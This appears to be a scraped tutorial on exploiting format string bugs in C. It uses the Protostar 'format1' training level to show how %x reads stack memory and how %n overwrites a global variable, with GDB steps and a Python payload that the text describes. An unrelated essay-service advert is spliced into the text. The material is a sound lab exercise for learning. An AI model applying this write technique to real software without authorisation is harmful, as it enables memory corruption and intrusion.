Format strings are a handy way for programmers to whip up a
string from several variables. They are designed to save the programmer
time and allow their code to look much more clean. Unbeknownst to some
programmers, format strings can also be used by an attacker to
compromise their entire program. Today we are going to take a look at
just how we can use a format string to exploit a running program.
What Is a Format String?As
mentioned above, a format string is a neat method by which a programmer
can structure a string that they either plan to print or store to a
variable. In the C programming language, a format string looks something
like this.printf( “We have %d dogs”, 2 );And will output something like this:We have 2 dogsThe
secret ingredient in the format string is the format specifier. The
format specifier is the “%d” in the command we just wrote. When the
program sees a format specifier, it knows to expect a variable to
replace that specifier. In this case, the variable was the integer 2.
Here’s another example.char *person1 = “Bob”;char *person2 = “Alice”;int books = 15;printf(“%s and %s have %d books”, person1,person2,books);Let’s
go line by line and walk through exactly what the program does. On the
first two lines, we define two strings, person1 and person2, and assign
them the values of “Bob” and “Alice” respectively. On line three, we
define an integer variable named books, and give it the value 15.
Finally on the last line we print out a formatted string. In the string
we see two unique format specifiers, “%s” and “%d”. As you might have
guessed, each one expects a different data type. “%s” expects a string,
while “%d” expects an integer. There are several other format specifiers
as well. These include”%x” which expects a hexadecimal value and “%c”
which expects a single character.Now that we know how to use format strings, it’s time to learn how to misuse them!
We Will Write a Custom Essay about Format through exactly what the program does. On
For You For Only $13.90/page!
order now
Taking Advantage of Vulnerable FunctionsWhile
format strings seem to merely be a different programming technique for
concatenating variables and strings, this is not actually the case. Our
example of format strings that we looked at above should raise one very
important question: What happens when you have a format specifier in a
string, but there is no variable included to replace that format
specifier in the string? Let’s hop back into the Protostar virtual
machine and find out.If you don’t yet have Protostar installed, check out the installation guide in our first article on exploit development.Don’t Miss: How to Learn Binary Exploitation with ProtostarOnce
again we will SSH into our virtual machine with the username “user” and
the password “user”. Once we’re logged in, it might be a good idea to
type the following command:bashThis
will take us from our current shell program to a much more interactive
shell program called bash. This will make our command line experience
much more smooth.Once that is taken care of, we’re going to jump
right in and take a look at the format1 level. Let’s move to the same
directory as the format1 executable by typing:cd /opt/protostar/binNow before we recklessly fling ourselves at the challenge, let’s take a look at the source code found on exploit exercises: This source code might be a little intimidating for those unfamiliar with C programming, but I promise it’s not that bad.Going
line by line, we first see a global integer named target being declared
without a value. The fact that this variable is being declared globally
instead of inside a function is very important. This changes where in memory the variable is stored.
Instead of being stored on the stack, the target variable will be
stored in the uninitialized data or BSS section of the program. This
means we won’t be able to simply flood the stack with an ungodly amount
of characters to alter the value of the target variable like we have
done with stack overflow vulnerabilities in previous articles.Don’t Miss: How to Manipulate Code Execution with the Instruction PointerContinuing
to look at the program, we see a function declared with the name vuln. I
wonder if this is where we will find the format string vulnerability…The
first thing that happens in the vuln function is a call to the printf
function. This call will print the contents of the variable named
string. We first see reference to the string variable on line 8 when it
is declared as a parameter for the vuln function. This means that when
the vuln function is called, a string is passed as an argument and given
the variable name “string” to be used in the function.Next we
see an if statement. Essentially the statement is saying “if the
variable target holds any value besides zero, print the following
string.” From this if statement we can gather that our objective is to
somehow modify the target variable.Finally we can see down on
line 17 the main function for the program. Inside the main function is a
call to the vuln function we just looked at, with the value “argv1”
passed as an argument. The variable “argv1” refers to the first
command line argument given to the program when it is originally run.
This is where we will be placing our exploit once it is finished.For
now, let’s just try to answer the question we posed above: What happens
when you have a format specifier with no variable to replace it with?
The Odd TruthWe
can see from the above source code that whatever string we pass as a
command-line argument to the program will be printed on line 10 with the
call to the printf function. Knowing that, let’s stop talking about it
and see what actually happens if we pass a format specifier as that
argument: Well
that’s…strange. When we pass the %d format specifier, instead of
printing “%d” or throwing an error like we might expect, we get some
random integer. Where is that integer coming from? We could fire up the
GDB debugger and try to dig through the program to find it, but looking
at memory in integer form is sort of messy. Maybe there’s a way we can
get this number in hexadecimal form.Like we mentioned earlier,
there’s another format specifier that expects a hexadecimal value. Let’s
see what happens if we replace %d with %x as our argument: Lo
and behold we get a value (highlighted in red) that looks a lot like a
hexadecimal value. Let’s see if we can find this value somewhere in
memory with the GDB debugger.To start GDB and attach it to the format1 program, let’s type the following.gdb format1Once
GDB has started up, we need to set a break point. Looking back at the
source code, line 14 seems like a good choice. To set a break point, we
type.break 14Now
we’re all set to run the program. In GDB, you can run a program with
command line arguments by using the run command with the command line
arguments right after. In this case, we’ll typerun %xThis
will run the program with “%x” as the argument. Once we run the program
we should hit a break point, as seen in the image below: When
we hit a break point, execution of the program is halted. From here we
can examine individual chunks of memory with the “x” command. Let’s
start by looking at the stack. To do this, we’ll type.x/32x $espThe
first x is short for “examine.” This command allows us to examine
memory, so the name is fitting. The /32 specifies that we want to
examine the next 32 four-byte segments. The final x at the very end
tells GDB that we want to view this section of memory in hexadecimal
format. The last term “$esp” tells the command to start looking at
memory at the very beginning of the current stack frame. Let’s see what
output we get from this command: Now
we can see a ton of data from the stack, but one section should stick
out to us: That same hexadecimal value that was printed earlier is
sitting on the stack!We finally have the answer to our question.
When a format specifier doesn’t have a corresponding variable to replace
it, the program will simply grab the value in memory at the location
where it would have expected the corresponding variable to be. When we
have a program that improperly allows a user to print a string
containing a format specifier, an attacker gains the ability to read
data right from memory.
Going from Reading Data to Writing DataWhile
reading data we shouldn’t be able to is interesting, writing data that
we shouldn’t be able to write is way more fun. With this fun comes
complication, however, so hold onto your keyboards and get ready.There
is one more format specifier we have yet to talk about. This specifier
is “%n”. While every other format specifier is focused on reading a
particular type of data, %n is focused on writing data. Specifically, %n
will write the length of the format string up to that point to the
address of a variable. The important thing to note here is that the %n
format specifier expects the address of a variable, not the variable itself.Well
wait a minute: If the program we’re looking at will automatically grab
an address to read from for the other format specifiers, will it
automatically grab an address to write to for the %n specifier?
Absolutely it will.
Getting to Where We Want to BeIn
order for us to overwrite the target variable, we’re going to need to
write its address to memory and then set up %n to write to that address.
In order to do that, we first need to know where our original input is
on the stack.
Step 1Finding Where We Are Starting FromIn order to find where the string variable is located, let’s restart the program in GDB. This time, we’re going to type.run AAAA.%x.%xOnce again we will hit the break point, and we can start digging.To find the location of the string address, we’ll type the following:p stringIn
this command “p” is short for print. This command will print whatever
variable we pass to it, along with the location of that variable. Our
output should look something like this: From
this output we can gather that the string variable is located at
0xbffff987. If we examine the memory at that location, we will in fact
find the hexadecimal representation of the four A’s we typed at the
beginning of our input.Here’s the trick: This memory address
(0xbffff987) is higher than the memory address of the data we read using
the format specifier. This means that if we provided a string with
enough format specifiers, we would continue to climb up the memory
addresses until we end up returning to the beginning of our string. If
we do the math we can find out just how many format strings we would
need to do that: By
subtracting the address of the data on the stack from the starting
address of the string variable, we can see that the two are 547 bytes
away. By rounding that up to 548 and dividing by four, we can see we
will need roughly 137 format specifiers to return to our original
string. This sounds like a job for a python script.
Step 2Writing a Skeleton for Our ExploitLet’s exit out of GDB and type the following command to return to our home directory:cdShort and sweet. Once we’re home, let’s use the nano text editor to open up a new text document.nano exploit.pyOnce we’re in nano, let’s type up a skeleton exploit: Going
through the code, the first line tells the bash shell that when it
tries to execute this file, it should use the python compiler. The next
two lines import modules that we’ll need for the exploit. The os module
will allow us to make a system call to run the format1 program. The
struct module will come in handy when it comes to writing memory
addresses later on.Line four creates an absolute whale of a
string variable named payload. Inside that variable we will be storing
four A’s along with 137 format specifiers. It’s very
important to note the periods that are placed within the string.
Depending on how long or short the payload is, the format string will
grab data from memory in chunks that differ slightly. We need to make
sure that all four of our A’s stay in the same section of memory that
will be read by a single format specifier. When practicing on your own,
you’ll just have to play around with the length of the string until you
find a combination that works.Once we’re done writing the
skeleton script, we can save it and run it. Running our exploit skeleton
yields the following output: Because
we supplied 137 format specifiers, we got 137 four-byte chunks of
memory. This includes the memory we were looking at in GDB earlier.Looking
at the output, we can see our four A’s (highlighted in red). We seem to
have overestimated how many format specifiers we needed though. This is
most likely because the structure of a programs memory is slightly
different when running in GDB instead of by itself. Editing our exploit
so we only supply 132 format specifiers instead of 137 should put us
exactly where we want to be: Perfect.
From here we can see the light at the end of the tunnel. The glory of
exploitation is almost upon us, but there is one more step.
Step 3Locating & Overwriting the Target VariableWe
need to hop back into GDB one more time to get an important piece of
information. We’re going to replace the four A’s at the beginning of our
payload string with the address of the target variable. That way, we
can substitute the last %x modifier for a %n modifier which will read
the address of target and overwrite it with the length of the string. In
order to get the address of target, we must type the following into
GDB.p &targetThe
“&” in front of the variable name tells GDB that we want the
address of the variable, not the value of the variable itself. Running
that command yields the following result: Now
all we have to do is slap that bad boy into our program and we should
be good to go. Our final exploit should look like this now: There
were two changes made: First, we added a new variable called address.
This will hold the address of the target variable. We use the
struct.pack function in order to store the address in a format that the
format1 program will interpret correctly.The second change comes
when we are creating the payload variable. Instead of starting the
string with four A’s, we start with the address variable now. We make
sure to include the period afterwards to make sure the address aligns
with where the format specifiers are reading from. We also print one
less %x format specifier and instead print a %n format specifier in its
place. This is done so that the %n format specifier will read the
address we wrote at the beginning of the string and overwrite the data
at that address. In this case, that address will (hopefully!) be the
address of the target variable.
Step 4Basking in Our SuccessOnce we’ve made the necessary changes to the program, let’s see what happens when we run it: The program confirms that we hit the target variable perfectly, and overwrote its data with our own. Sweet victory.Thank
you for reading! Format string exploitation is a bit of a monster to
understand at first and while these vulnerabilities don’t often appear
in the wild anymore, they are really great at helping you better
understand what is actually going on behind the scenes of a program.
Comment below with any questions or contact me via Twitter @xAllegiance.